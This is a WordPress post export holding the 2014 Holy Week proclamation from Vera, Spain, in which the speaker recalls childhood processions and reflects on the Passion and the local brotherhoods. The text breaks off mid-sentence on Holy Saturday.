{"id":297,"date":"2014-04-16T08:27:50","date_gmt":"2014-04-16T08:27:50","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=297"},"modified":"2015-11-23T10:34:57","modified_gmt":"2015-11-23T10:34:57","slug":"pregon-semana-santa-2014","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2014\/04\/16\/pregon-semana-santa-2014\/","title":{"rendered":"PREG\u00d3N SEMANA SANTA 2014"},"content":{"rendered":"<div style=\"text-align: justify\" title=\"Page 2\">\n<div>\n<div>\n<p>INTRODUCCIO\u0301N Y DEDICATORIA PREGO\u0301N SEMANA SANTA 2014<\/p>\n<p>Muchas gracias, Isabel, no solo por estas carin\u0303osas palabras con que me presentas, sino tambie\u0301n por las que me dirigiste por tele\u0301fono dos di\u0301as despue\u0301s de esta designacio\u0301n. Me dijiste que entendi\u0301as mis nervios porque es cierto que con mucha responsabilidad hay que asumir esta tarea, pero tambie\u0301n me diste a\u0301nimos y me recordaste que es un ejercicio hermoso, que lo disfrutara. Las mismas palabras que tambie\u0301n me han dicho otros pregoneros familiares y amigos.<\/p>\n<p>Aqu\u00ed estoy, nerviosa, como una nin\u0303a que fuera a hacer su primera confesio\u0301n y comunio\u0301n, y emocionada entre estas emblema\u0301ticas y bellas ima\u0301genes de tan sublime significado, a las que se suma este an\u0303o una nueva que an\u0303ade un punto especial para m\u00ed.<\/p>\n<p><!--more--><\/p>\n<p>Me refiero a Mar\u00eda Sant\u00edsima de la Fe, Reina de la familia cristiana, a quien mientras haci\u0301a este prego\u0301n tambie\u0301n he implorado para que aumente mi fe y me ayude a saber transmitirla cada d\u00eda a los dema\u0301s.<\/p>\n<p>Pero antes de iniciar mi prego\u0301n, me vais a permitir que se lo dedique a aquellas personas a las que, segura estoy, les hubiera gustado conocer el contenido de lo que esta noche vengo a proclamar. Porque a m\u00ed tambie\u0301n me reconforta el que ellos este\u0301n presentes los traigo a mi memoria, antes de comenzar, para sentirlos ma\u0301s cerca todav\u00eda.<\/p>\n<p>A vosotros, Padre, Suegro, Prima, Familiares todos, DonMa. Porque se\u0301 que cada uno sabre\u0301is acogerlo con carin\u0303o y devolve\u0301rmelo.<\/p>\n<div title=\"Page 3\">\n<div>\n<div>\n<p>Reverendo Sr. Cura Pa\u0301rroco; Ilmo. Sr. Alcalde; Sra. Representante de la Agrupacio\u0301n de Hermandades y Cofradi\u0301as, y Hermanos Mayores; familiares presentes y aquellos que ya en el cielo segu\u00eds viviendo en mi corazo\u0301n; amigos y vecinos; hermanos todos en Cristo, muy buenas noches.<\/p>\n<p>Si bien no es la primera vez que subo a una tribuna, que\u0301 lejos estaba yo de imaginar que la llamada de don Carlos, el martes 18 de febrero, iba a ser para invitarme, en nombre de la Junta de Hermandades y Cofrad\u00edas, a ocupar esta por la que han pasado tan grandes cristianos pregoneros.<\/p>\n<p>Mis primeras palabras (realmente no se\u0301 si las dije en voz alta -al menos son las que pense\u0301 producto de los nervios que se anudaron en mi esto\u0301mago-) fueron \u201c\u00a1Sen\u0303or m\u00edo y Dios m\u00edo!\u201d. Pero, a pesar de la duda, acepte\u0301 esta invitacio\u0301n. Dije si\u0301 porque pense\u0301 que posiblemente Dios me estaba sometiendo a prueba, una ma\u0301s, para afianzar mi fe. As\u00ed, como Toma\u0301s, me aferre\u0301 de nuevo al Sen\u0303or para que, en esta tarea que me encomendaba, me fortaleciera, me guiara y me concediera desde su amor infinito el modo de comunicar con E\u0301l, con vosotros, y poder pregonar este acto de amor y entrega, este canto de VIDA, que es la Semana Santa.<\/p>\n<p>Porque es esta una misio\u0301n de mucha responsabilidad y compromiso, os pido comprensio\u0301n si este prego\u0301n no alcanza el lirismo o didactismo de otros; no sin antes mostrar mi agradecimiento a don Carlos y a la Agrupacio\u0301n de Hermandades y Cofradi\u0301as por depositar su confianza en m\u00ed; a todos vosotros, por vuestra compan\u0303\u00eda; y, por supuesto, a Dios, por haberme puesto en el camino a tantas personas que me han ayudado a lo largo de mi vida a mantener, aunque a veces con ciertas sombras, viva mi fe.<\/p>\n<p>Primero fueron mis padres quienes me educaron en ella; despue\u0301s, a trave\u0301s de mi marido y, con e\u0301l, mis suegros, conoc\u00ed el sentir solidario de lo que era una hermandad; luego llegaron mis hijos y, precisamente, de sus infantiles manos, y de las que me tendieran al mismo tiempo Juani Gallardo y don Manuel Pozo para formar parte del Equipo de Liturgia, me acerque\u0301 de nuevo a la iglesia, despue\u0301s de un tiempo en el que anduve perdida. Gracias a todos tambie\u0301n.<\/p>\n<div title=\"Page 4\">\n<div>\n<div>\n<p>Retomar\u00eda aqu\u00ed un camino de fe, ya desde la madurez, y desde la razo\u0301n. Y vendr\u00edan despue\u0301s otros pa\u0301rrocos y otros compan\u0303eros de camino. A todos doy las gracias, especialmente a don Manuel Mencho\u0301n, por todo lo que de e\u0301l aprend\u00ed y por la amistad que me brindo\u0301, y, con e\u0301l, a los amigos que hice en el viaje de peregrinacio\u0301n a Tierra Santa, porque ensancharon mi corazo\u0301n de tal manera que desde entonces me propuse perder el pudor que suele ir ligado a la manifestacio\u0301n de los sentimientos.<\/p>\n<p>En esa tarea estoy, y precisamente hoy tengo la oportunidad de venir con mi corazo\u0301n por delante, ante vosotros. Pero para llegar hasta aqu\u00ed he necesitado primero pensar en soledad y silencio, he tenido que hablar conmigo a solas para poder hablarle a Dios, he buscado la verdad releyendo la Biblia e informa\u0301ndome de otros documentos, he respetado la tradicio\u0301n, y he revivido acontecimientos de mi infancia, de mis viajes peregrinos, de mi quehacer diario tanto en mi vida familiar, como profesional, como miembro, en definitiva, de esta comunidad cristiana, para encontrar que\u0301 palabras podri\u0301a hilvanar que sean las justas y precisas, las exactas. Espero que en esta ocasio\u0301n, ayudadas por el impulso del corazo\u0301n, las palabras puedan fluir en este prego\u0301n con que abrimos las puertas de la Semana Santa. Una Semana en la que rezamos, admiramos, son\u0303amos, vivimos, esperamos, nos sentimos parte de un mismo pueblo que en estos d\u00edas inicia un viaje compartido y solidario, una peregrinacio\u0301n que hara\u0301 que nos sintamos pueblo \u201celegido\u201d.<\/p>\n<p>Ese viaje comienza en nuestra nin\u0303ez, porque es en esa etapa de la vida cuando las vivencias se hacen ma\u0301s profundas y despiertan los sentidos y el esp\u00edritu. Afirmo\u0301 Antonio Machado que \u201cno hay nada verdaderamente importante en la vida que no pueda o deba explicarse a un nin\u0303o. Basta con encontrar el lenguaje apropiado\u201d.<\/p>\n<p>As\u00ed es como nuestros padres nos inculcan una pasio\u0301n que nunca nos abandona. S\u00ed, porque ni siquiera cuando la rebeld\u00eda juvenil nos aleja de las bases de la familia, podemos desasirnos totalmente de nuestra educacio\u0301n, que, sin duda alguna, de nuevo resurgira\u0301. Y yo, como todos, fui educada en la Pasio\u0301n y me complace \u201cson\u0303arla\u201d y seguir vivie\u0301ndola.<\/p>\n<\/div>\n<\/div>\n<table>\n<tbody>\n<tr>\n<td>\n<div>\n<div>\n<p>Agranda la puerta&#8230; Agranda la puerta, Padre, porque no puedo pasar. La hiciste para los nin\u0303os, yo he crecido, a mi pesar.<\/p>\n<\/div>\n<\/div>\n<\/td>\n<td>\n<div>\n<div>\n<p>Si no me agrandas la puerta, achi\u0301came, por piedad; vue\u0301lveme a la edad aquella en que vivir es son\u0303ar.<\/p>\n<p>(M. Unamuno)<\/p>\n<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div title=\"Page 5\">\n<div>\n<div>\n<p>VIDA \u2013 SUEN\u0303O \u2013 PASIO\u0301N \u2013 MUERTE \u2013 RESURRECCIO\u0301N &#8211; VIDA<\/p>\n<p>Os invito a SO\u00d1AR conmigo LA PASI\u00d3N-MUERTE Y RESURRECCI\u00d3N:<\/p>\n<p>Mis suen\u0303os se remontan a esos d\u00edas de mi infancia cuando con la llegada de la primavera, a trave\u0301s de las ventanas ya abiertas, entraban la brillante luz del d\u00eda y el aroma intenso de azahar que emanaba el jardi\u0301n de la Verja. Mi madre me vest\u00eda con ropa nueva, que ella misma cos\u00eda, para los d\u00edas especiales que llegaban. Me recuerdo con un vestido blanco bordado con guirnaldas de flores, y con unas trenzas morenas rematadas en lazos tambie\u0301n blancos. Todo preparado ya para vivir con alegr\u00eda el acontecimiento del DOMINGO DE RAMOS, puerta de la Semana Santa.<\/p>\n<p>Las campanas tocaban con sus repiques a fiesta anunciadora de la triunfal entrada de Jesu\u0301s en Jerusale\u0301n cuando este rey montaba tan solo un borrico: \u201cBendito es el que viene en el nombre del Sen\u0303or\u201d. Y desde nuestra Plaza Mayor en procesio\u0301n nos identifica\u0301bamos con las personas, que a lo largo del camino, con palmas y ramos de olivo, se unieron a Jesu\u0301s. Escucha\u0301bamos en misa el relato de la Pasio\u0301n y no entend\u00eda muy bien por que\u0301 precisamente ese era el Evangelio en este d\u00eda de ju\u0301bilo. Volveri\u0301amos despue\u0301s a casa con la palma ya bendecida, que mi padre, acompan\u0303ando al cortejo municipal, hab\u00eda portado en la procesio\u0301n, y que luego durante todo el an\u0303o presidir\u00eda la fachada principal de mi casa: \u201cBendice Sen\u0303or nuestro hogar. Se\u0301 tu\u0301 nuestro Rey\u201d. Yo preguntaba que\u0301 significaba exactamente ese ritual. Mis padres me lo explicaban: era el s\u00edmbolo de nuestra alegr\u00eda por haber aclamado a Jesu\u0301s como nuestro Salvador. Jesu\u0301s nos concede, con la posibilidad de seguirle, la de ser sus amigos y con ello nos da la llave de la vida.<\/p>\n<p>As\u00ed comenzaba todo, celebrando la VIDA. Ya cobraba sentido que en la misa estuvie\u0301ramos conducidos por el Evangelio de la Pasio\u0301n, porque esto supon\u00eda situarnos en las coordenadas del verdadero reinado de Cristo: \u00c9l reinara\u0301 desde la Cruz. Y en la mesa eucar\u00edstica nos unimos a \u00c9l en su muerte, seguros de triunfar con \u00c9l en su resurreccio\u0301n.<\/p>\n<p>HOY, como ayer, en procesio\u0301n que organiza EL GRUPO SAN CLEOFA\u0301S, somos galileos que en Jerusale\u0301n alzaron sus ramos un domingo aclamando la entrada triunfal de Jesu\u0301s. Hoy somos conscientes de que esos gritos de ju\u0301bilo se convirtieron ma\u0301s adelante en gritos enfurecidos de \u201ccrucif\u00edcale\u201d, o incluso, de parte de los ma\u0301s cercanos, en silencios, protestas, renuncias y negaciones como s\u00edmbolo de abandono.<\/p>\n<div title=\"Page 6\">\n<div>\n<div>\n<p>Ya los pasajes evange\u0301licos de LUNES, MARTES Y MIE\u0301RCOLES SANTO anuncian que los apo\u0301stoles, los amigos ma\u0301s \u00edntimos de Jesu\u0301s, lo dejar\u00edan solo durante la Pasio\u0301n:<\/p>\n<p>El LUNES SANTO escuchamos co\u0301mo Judas se queja de lo caro que es el perfume con que Mar\u00eda unge los pies de Jesu\u0301s. La protesta de Judas no tiene ninguna utilidad, so\u0301lo le lleva a la traicio\u0301n.<\/p>\n<p>HOY, como cristianos que somos, no podemos caer en la misma queja de Judas. Hoy comprendemos que la accio\u0301n de Mar\u00eda la lleva a amar ma\u0301s a su Sen\u0303or y, como consecuencia, a amar ma\u0301s a los \u201cpies\u201d de Cristo. Mar\u00eda tiene un gesto de amor y, como todo acto de amor, es difi\u0301cil de entender por aquellos que no lo ejercitan. Escribir\u00eda ma\u0301s tarde san Agusti\u0301n: \u201cQuiza\u0301 en esta tierra los pies del Sen\u0303or todavi\u0301a esta\u0301n necesitados\u201d. Esos pies, sin duda, son precisamente \u201clos necesitados\u201d.<\/p>\n<p>HOY, besando los pies clavados de Cristo, lo que queremos es mantenerlos vivos, y, guiados por ellos, seguir caminando con E\u0301l en ayuda de nuestros hermanos, especialmente los ma\u0301s necesitados: las v\u00edctimas de las guerras y del hambre, del paro y del desamparo, del maltrato y del engan\u0303o, de la enfermedad y de la soledad&#8230;<\/p>\n<p>Es cierto que este camino, este seguir a Jesu\u0301s, no es un camino sin obsta\u0301culos. Jesu\u0301s lo sabe y por eso les dio a sus disc\u00edpulos una leccio\u0301n clara de los momentos de oscuridad que les esperaban.<\/p>\n<p>Ya en los episodios evange\u0301licos de MARTES Y MI\u00c9RCOLES SANTO Jesu\u0301s declara que uno de los doce lo entregara\u0301 y que otro lo negara\u0301. Lo que ma\u0301s impresiona de los relatos es comprobar que la traicio\u0301n y el abandono se dan en el ci\u0301rculo de aquellos que le han seguido y han tenido acceso a su corazo\u0301n. \u00bfCo\u0301mo sus amigos pueden hacerle eso? -me pregunto, como nin\u0303a que era.<\/p>\n<p>HOY, nosotros cristianos, tenemos la oportunidad de preguntarnos hacia do\u0301nde dirigimos nuestras vidas. \u00c9l, presente en cada uno de nosotros, esta\u0301 aguardando nuestra eleccio\u0301n: si queremos seguir junto a \u00c9l participando en la oracio\u0301n, los sacramentos y la mesa eucar\u00edstica; si queremos darle un nuevo rumbo a nuestra vida en la relacio\u0301n con los dema\u0301s; si queremos quedarnos en nosotros mismos y nuestros ego\u00edsmos o si queremos amar a los dema\u0301s, ayudar a los dema\u0301s, comprometernos con los dema\u0301s&#8230; E\u0301l por amor nos hizo libres&#8230; Nosotros decidimos.<\/p>\n<div title=\"Page 7\">\n<div>\n<div>\n<p>Y la decisio\u0301n empieza cuando somos nin\u0303os. Precisamente en ellos Jesu\u0301s ha depositado una espera especial: \u201cDejad que los nin\u0303os se acerquen a m\u00ed\u201d, dir\u00eda. Y los nin\u0303os y jo\u0301venes de Vera, como antan\u0303o haci\u0301amos los que hoy somos adultos, deciden salvar obsta\u0301culos y atienden a su requerimiento. No lo defraudan. Y constituyen grupo dentro de las hermandades para seguir su camino. \u201cDejando que E\u0301l nos ame, sentiremos su ternura tan hermosa\u201d, nos dice el Papa Francisco.<\/p>\n<p>Por eso HOY, el MARTES SANTO se ha revestido de una ternura especial cuando las calles de Vera se inundan de Esperanza con Jesu\u0301s portado por esos hombros infantiles que suen\u0303an con aliviar su dolor, con acompan\u0303ar a su Madre para arrancarle Soledad, mientras a la vez les concede indulgentes Perdones a sus leves faltas infantiles.<\/p>\n<p>Y hablando de nin\u0303os, vuelvo a son\u0303ar mi nin\u0303ez:<\/p>\n<p>Recuerdo, en escenas, la noche del MIE\u0301RCOLES SANTO, cuando acompan\u0303aba a mi madre a la procesio\u0301n del Vi\u0301a Crucis. Mi madre me ha explicado: vamos a acompan\u0303ar a Jesu\u0301s siguiendo sus pasos hacia la Muerte que sera\u0301 Vida. E\u0301l es nuestro Camino, nuestra Salvacio\u0301n.<\/p>\n<p>Calles oscuras. Velas encendidas. Hombres, mujeres y nin\u0303os en dos filas. Imagen de Cristo clavado en la Cruz. Episodios de la Pasio\u0301n. Oracio\u0301n: \u201cTe adoramos, oh, Cristo, y te bendecimos porque por tu santa cruz redimiste al mundo y a m\u00ed pecador\u201d. Cantos: \u201cPerdona a tu pueblo, Sen\u0303or\u201c, o \u201cSa\u0301lvame, Virgen Mar\u00eda, o\u0301yeme, te imploro con fe&#8230;\u201d. Suspiros. Emocio\u0301n. Meditacio\u0301n silenciosa.<\/p>\n<p>HOY, como ayer, cristianos de Vera, continuamos en procesio\u0301n por nuestras calles, que se convierten en la v\u00eda dolorosa que conduce al Calvario. Y creemos que cada paso del Condenado, cada gesto o palabra suya, as\u00ed como lo que vieron e hicieron todos aquellos que tomaron parte en este drama, nos hablan continuamente. Es cierto que hubo quienes le injuriaron, pero tambie\u0301n quienes quisieron ayudarlo. En su pasio\u0301n y en su muerte, Cristo nos revela tambie\u0301n la verdad sobre Dios y sobre el hombre. Deci\u0301a San Agust\u00edn: \u201cLa oracio\u0301n es el encuentro de la sed de Dios y de la sed del hombre\u201d. Orar es respirar ese aire nuevo del esp\u00edritu que procede del mismo Dios, comunicarse con \u00c9l, hablarle como un amigo habla con su amigo, para contarle penas y alegr\u00edas, sufrimientos y fracasos, perplejidades y esperanzas. As\u00ed caminamos con e\u0301l.<\/p>\n<div title=\"Page 8\">\n<div>\n<div>\n<p>Si sigo recordando mi infancia suen\u0303o los d\u00edas siguientes del TRIDUO PASCUAL, los di\u0301as de la Preparacio\u0301n para la Pascua, Pasio\u0301n y Muerte de Jesu\u0301s que nos llevar\u00edan a su Resurreccio\u0301n:<\/p>\n<p>En los Oficios del JUEVES SANTO, en la Iglesia, en torno al altar, ya se encontraban doce disci\u0301pulos preparados para celebrar la Pascua, y, dispuestos para la Cena, asisti\u0301amos al lavatorio de los pies. Soy una nin\u0303a y entiendo que para comer lo que hay que lavar son las manos. Pero, acompan\u0303ado del mensaje, todo empieza a cobrar sentido y al final comprendo: el acto de que sea Jesu\u0301s, El Maestro, quien lava los pies a los apo\u0301stoles, los disci\u0301pulos, significa que E\u0301l estaba entre ellos, no como un superior, sino como un servidor: \u201c\u00bfComprende\u0301is lo que he hecho con vosotros? Vosotros me llama\u0301is \u00abel Maestro\u00bb y \u00abel Sen\u0303or\u00bb, y deci\u0301s bien, porque lo soy. Pues si yo, el Maestro y el Sen\u0303or, os he lavado los pies, tambie\u0301n vosotros debe\u0301is lavaros los pies unos a otros&#8230;\u201d. (Jn 13,14).<\/p>\n<p>HOY, como ayer, acudimos de nuevo el JUEVES SANTO a escuchar la Palabra, buscando en ella el verdadero mensaje que se origina en ese acto de servicio que no es otra cosa que amor: \u201cOs doy un mandamiento nuevo, que os ame\u0301is unos a otros como yo os he amado\u201d (Jn 15,12). Y tanto nos ama que ni siquiera nos dice que le amemos a E\u0301l, sino que amemos como \u00c9l. Y es a trave\u0301s del lavatorio de los pies como tenemos que llegar a desentran\u0303ar el verdadero significado de la Eucaristi\u0301a: Cuando parte y reparte el pan, cuando toma el vino, y lo da a beber a los dema\u0301s, Jesu\u0301s nos esta\u0301 dando su cuerpo y su sangre dicie\u0301ndonos que lo tomemos, porque todo lo que E\u0301l es nos lo da: \u00c9l, que es amor, se nos entrega y nos pide que seamos nosotros quienes hagamos lo mismo: \u00ab&#8230;Os he dado ejemplo para que lo que yo he hecho con vosotros, vosotros tambie\u0301n lo haga\u0301is\u00bb. O \u00abHaced esto en memoria mi\u0301a\u00bb. He ahi\u0301 el sentido de la misa: comulgar con Jesu\u0301s es comprometernos a amar a los dema\u0301s. La Cena en la noche de Jueves Santo fue la anticipacio\u0301n de su muerte en cruz al di\u0301a siguiente para salvar a todos los hombres.<\/p>\n<p>Tambie\u0301n, de nin\u0303a, escuchaba atentamente el Evangelio de la Pasio\u0301n en los Oficios de VIERNES SANTO: Jesu\u0301s es apresado en el Huerto de los Olivos; a palos y empujones lo llevan a la ciudad y alli\u0301 es azotado, humillado, escarnecido, y le hacen cargar con una cruz hacia el Calvario donde lo crucifican y muere. Aquellos que estaban alli\u0301, y lo vieron, nos transmitieron los hechos y, al mismo tiempo, nos descubren el sentido de aquella muerte: un acto de amor.<\/p>\n<div title=\"Page 9\">\n<div>\n<div>\n<p>HOY, como ayer, VIERNES SANTO, tanto amor desprendido nos convoca de nuevo a los cristianos a vivir la Muerte de Jesu\u0301s. Enmudecidas las campanas, sin manteles, flores ni velas, ponemos los oi\u0301dos atentos a la palabra de Dios: \u201cE inclinando la cabeza entrego\u0301 su Esp\u00edritu\u201d (Jn 19,30). Hoy, mira\u0301ndolo muerto en la cruz comprendemos que no le importo\u0301 el sufrimiento; s\u00ed, su obediencia y fidelidad a Dios. Por tanto, es el d\u00eda de la Cruz victoriosa, desde donde Jesu\u0301s nos dejo\u0301 lo mejor de E\u0301l mismo: Mar\u00eda como madre, el perdo\u0301n \u2014tambie\u0301n de sus verdugos\u2014 y la confianza total en Dios Padre.<\/p>\n<p>La Cruz ya no es ignominia, sino salvacio\u0301n: \u201cMirad el a\u0301rbol de la Cruz del que estuvo colgada la Salvacio\u0301n del mundo. Venid a adorarlo\u201d, aclamamos dentro de esta celebracio\u0301n. Y esa mirada a Jesu\u0301s tenemos que hacerla con los ojos del corazo\u0301n, con los del amor, con los de la esperanza en su Resurreccio\u0301n, garant\u00eda de la nuestra. Despue\u0301s en esa misma celebracio\u0301n comulgamos la Eucarist\u00eda que, consagrada el Jueves Santo, y reservada en el silencio de la noche anterior, aviva esta esperanza segu\u0301n su promesa, porque \u201cal que come mi carne, Yo lo resucitare\u0301\u201d (Jn 6,54).<\/p>\n<p>Y tambie\u0301n suen\u0303o las procesiones de estos dos di\u0301as de mi infancia:<\/p>\n<p>Ajena desde mi familia a las ocupaciones de las hermandades (no formaba parte de ninguna), recuerdo que, a la vez que viv\u00eda la Pasio\u0301n aprendida de la Palabra, senti\u0301a profunda admiracio\u0301n y atraccio\u0301n por todos los Pasos que, sobre ruedas y envueltos en un ir y venir continuo de operarios enchufando y desenchufando cables, desfilaban por nuestras calles.<\/p>\n<p>Con la emocio\u0301n propia de los nin\u0303os, cuando el Convento, cercano a mi casa, abr\u00eda sus puertas para preparar los tronos e ima\u0301genes de la Hermandad de San Juan, yo participaba de aquel ajetreo. Especialmente recuerdo el Paso de La Oracio\u0301n en el Huerto y el de de San Juan. La imagen ma\u0301s emblema\u0301tica, el Cristo de la Misericordia, se encontraba en la Iglesia de la Encarnacio\u0301n para veneracio\u0301n de todos los veratenses que buscaban dejarse envolver por la Misericordia de Dios.<\/p>\n<p>Paralelamente, la Hermandad de Jesu\u0301s se afanaba en la puesta a punto de El Lavatorio, (ma\u0301s tarde lo hari\u0301a con La Vero\u0301nica, La Magdalena&#8230;) y con mimo especial en la de Nuestro Padre Jesu\u0301s, en cuya ermita de San Ramo\u0301n, y bajo el amparo de su tu\u0301nica nazarena y el peso de su Cruz, siempre acogi\u0301a a sus fieles veratenses.<\/p>\n<div title=\"Page 10\">\n<div>\n<div>\n<p>A su vez, la Hermandad de la Virgen de las Angustias se esmeraba en abrillantar los pasos del Santo Sepulcro y el de Nuestra Excelsa Patrona, expuestos tambie\u0301n durante todo el an\u0303o en su Ermita, lugar que llega a ser paso (sin obligacio\u0301n) obligado de todo el que se precie de ser veratense, para refugiarse en su virginal manto protector.<\/p>\n<p>El pueblo ten\u00eda mucho que celebrar y, como en toda celebracio\u0301n, habi\u0301a que poner esmero y mucho amor. Todo estaba preparado para vivir el acontecimiento. E intentando ser fieles al pasaje evange\u0301lico, cada hermandad sacaba en procesio\u0301n sus sagradas ima\u0301genes alusivas a los hechos del d\u00eda. Y con sus pasos desfilaban distintos penitentes, mantillas, romanos, banda de mu\u0301sica municipal. Realmente en mi recuerdo, probablemente algo distorsionado por el paso del tiempo, situaba a la Virgen de las Angustias cerrando procesiones, pero, segu\u0301n he lei\u0301do, en un acta de Junta de Cofrad\u00edas del an\u0303o 1956 se recoge el acuerdo de las Hermandades sobre su participacio\u0301n y ubicacio\u0301n en los distintos desfiles procesionales.<\/p>\n<p>As\u00ed, en la noche de JUEVES SANTO desfilaban los pasos de El Lavatorio, San Juan, La Virgen de las Angustias, y La oracio\u0301n en el Huerto.<\/p>\n<p>Al amanecer del VIERNES SANTO Jesu\u0301s Nazareno, con su cruz en hombro, sub\u00eda, acompan\u0303ado por todos los hombres del pueblo, hacia su Calvario. Las mujeres no van en procesio\u0301n: son nuestras costumbres. Pero todas las calles y esquinas esta\u0301n ocupadas por ellas. Yo, nin\u0303a, tambie\u0301n acudo a ver la Subida. Mi madre me ha levantado para que sienta con Jesu\u0301s el destino que le aguarda. En la plaza, su Madre esta\u0301 presente, y como todo el pueblo, escucho la sentencia de Pilato a Jesu\u0301s condena\u0301ndolo a muerte. Sentencia de la que aprendi\u0301 algunos fragmentos de tanto oi\u0301rlos y a lo que favoreci\u0301a la cantinela pegadiza con que el romano la pregonaba.<\/p>\n<p>Todo el pueblo esta\u0301 en la calle y la procesio\u0301n del mediod\u00eda desfila ante sus ojos con El Lavatorio, Nuestro Padre Jesu\u0301s, San Juan y La Virgen de las Angustias.<\/p>\n<p>Era por la noche cuando el cortejo procesional se acrecentaba y, siguiendo el orden lineal de los acontecimientos, a los pasos de la man\u0303ana se an\u0303ad\u00edan dos ma\u0301s: El Cristo de la Misericordia, entre San Juan y La Virgen de las Angustias, y cerraba el cortejo El Santo Sepulcro: todo es silencio ante este Cristo yacente en su urna de cristal que ya ha pasado de este mundo hacia la Vida.<\/p>\n<div title=\"Page 11\">\n<div>\n<div>\n<p>La gente, desde las aceras, contemplaba conmovida todas las ima\u0301genes en cada una de las procesiones. Pero, vistas con ojos de nin\u0303a, impresionaban e infundi\u0301an tanta emocio\u0301n, respeto y devocio\u0301n que segu\u00eda leyendo en ellas lo que ya habi\u0301a escuchado en los relatos evange\u0301licos. As\u00ed que, aun perteneciendo esos pasos a distintas hermandades, entre las que podi\u0301a existir una cierta rivalidad, en mi opinio\u0301n no me equivoco, y creo interpretar la voz del pueblo, si digo que en el fondo todos los veratenses e\u0301ramos de todas. Y tanto en la Palabra como en esas tallas los nin\u0303os de entonces, que en estos di\u0301as ni siquiera juga\u0301bamos en sen\u0303al de luto, aprendimos a leer la VIDA.<\/p>\n<p>HOY, como ayer, tambie\u0301n vivimos el acontecimiento respetando la tradicio\u0301n, y aunque las procesiones han cambiado notoriamente tanto en sus pasos, como en la forma de los desfiles procesionales, seguimos saliendo a la calle, movidos por la fe, por la pasio\u0301n.<\/p>\n<p>Y la HERMANDAD DE SAN JUAN EVANGELISTA contagia su fervor a los veratenses en la noche del JUEVES SANTO: Jesu\u0301s le pide al Padre que no le haga pasar por el mal trago que pronto ocurrira\u0301, pero en un gesto de resignacio\u0301n dice: \u00bb ha\u0301gase tu voluntad y no la mi\u0301a\u00bb. Se preve\u0301 el fat\u00eddico final. Y los jo\u0301venes que portan La oracio\u0301n en el huerto oran con e\u0301l amparados por un A\u0301ngel que los guarda. Detra\u0301s el acompasado ritmo de las bandas y la llamada de campana reclaman que sus hombres eleven al cielo la imagen en la cruz de Cristo de la Misericordia, y las mujeres eleven al cielo como una oracio\u0301n a La Virgen de Gracia y Esperanza, a la que San Juan acompan\u0303a en su dolor cuando, convertida en su madre, pasa a ser la de todos, y e\u0301l, convertido en su hijo, nos representa a todos.<\/p>\n<p>\u201cNoche silenciosa presagio de un amanecer de dolor.\u201d<\/p>\n<p>Y HOY, como ayer, amanece VIERNES SANTO. Cargado con la cruz Jesu\u0301s camina hacia el suplicio. El peso del rudo madero supera sus fuerzas y cae bajo e\u0301l en tres ocasiones. Hoy los nazarenos de la HERMANDAD DE NUESTRO PADRE JES\u00daS, que lo portan, cual cirineos, con movimiento firme se prestan a levantarlo, mientras un largui\u0301simo cortejo de hombres lo acompan\u0303a en silencio. Hoy esos hombres son los que antan\u0303o eran los pequen\u0303os de la familia cuando iban protegidos por sus mayores, y ahora llevan delante a sus hijos y nietos por los que velan. Las nin\u0303as de entonces, que sali\u0301amos a las esquinas cogidas de las manos de nuestras madres, somos las mujeres de hoy que seguimos en las aceras queriendo con nuestra mirada, cual Vero\u0301nicas, limpiar el rostro de Jesu\u0301s.<\/p>\n<div title=\"Page 12\">\n<div>\n<div>\n<p>Todos llevamos nuestra cruz. Todos sufrimos. Pero Jesu\u0301s con su cruz esta\u0301 arrastrando tambie\u0301n las de todos nosotros. Y, emocionados, vemos aliviado nuestro dolor por la fuerza que emana de Aquel que dijo: \u201cmi yugo es llevadero y mi carga es ligera\u201d (Mt 11.30).<\/p>\n<p>El tiempo ha pasado, pero HOY, como ayer, el romano aguarda, prego\u0301n en mano. Esta\u0301 a punto de estallar la sentencia que rotunda e inexorablemente llevara\u0301 a Jesu\u0301s a la crucifixio\u0301n. All\u00ed tambie\u0301n esta\u0301 Mar\u00eda, la Virgen de las Angustias, esperando, dolorosa, el encuentro con aquel cuyo cuerpo, exangu\u0308e, descendido de la cruz, oprimira\u0301 pronto en su regazo.<\/p>\n<p>\u201cDrama\u0301tico suceso revivido con doble procesio\u0301n.\u201c<\/p>\n<p>Poco antes del mediod\u00eda, El Lavatorio de pies, s\u00edmbolo de entrega y amor, puerta de entrada a su paso por la cruz, es portado por generosas jo\u0301venes dispuestas a servir, como Jesu\u0301s lo hiciera. Despue\u0301s, al compa\u0301s de las lanzas de los soldados romanos, Nuestro Padre Jesu\u0301s Nazareno sigue su dolorosa v\u00eda mecido y arropado por sus hijos nazarenos. Detra\u0301s, otros ma\u0301s jo\u0301venes so-portan a ritmo acompasado la dolorosa pena de la Madre, la Virgen de la Piedad, que acoge en su regazo a su hijo con corazo\u0301n traspasado. Serena y carin\u0303osamente unidos, se prestan a calmar su dolor haciendo hermandad bajo la trabajadera.<\/p>\n<p>\u201cD\u00eda de luto para la familia cristiana.\u201d<br \/>\nDi\u0301a para derramar la\u0301grimas sinceras por quien tanto ha sufrido.<\/p>\n<p>Y HOY, como ayer, por la noche, Vera sale a la calle en cortejo fu\u0301nebre con la HERMANDAD DE LA VIRGEN DE LAS ANGUSTIAS. En penumbra, a la luz de unas ti\u0301midas velas y al compa\u0301s de suave y luctuosa mu\u0301sica, abre el cortejo un cuerpo desnudo maniatado a una columna, sus espaldas despellejadas: los hombres que lo portan quisieran desatarlo, pero ya a Jesu\u0301s se le ha dado severo castigo, la Flagelacio\u0301n. Una vez muerto, ha dejado de sufrir, pero no puede quedarse en la cruz. Yacente se encamina hacia la vida eterna en su Santo Sepulcro. Detra\u0301s la que nunca lo abandona, la que lo ha visto sufrir y morir, refleja en su rostro la angustia humana: es su madre La Virgen de las Angustias. Y bajo su manto de luto sus hijos de Vera, a la vez que lloran con ella, anhelan en silenciosa oracio\u0301n su proteccio\u0301n y refugio.<\/p>\n<p>HOY, como cristianos que somos, guardamos este silencio en nuestro interior el SA\u0301BADO SANTO.<\/p>\n<div title=\"Page 13\">\n<div>\n<div>\n<p>Mar\u00eda, en su Soledad por la pe\u0301rdida de su hijo, todav\u00eda ten\u00eda palabras de aliento para los que alrededor de ella se lamentaban desesperanzados; por eso tambie\u0301n la acompan\u0303amos en el acto mariano que se celebra esta man\u0303ana de sa\u0301bado en la Iglesia. Estamos a la espera de celebrar por la noche el mayor de todos los 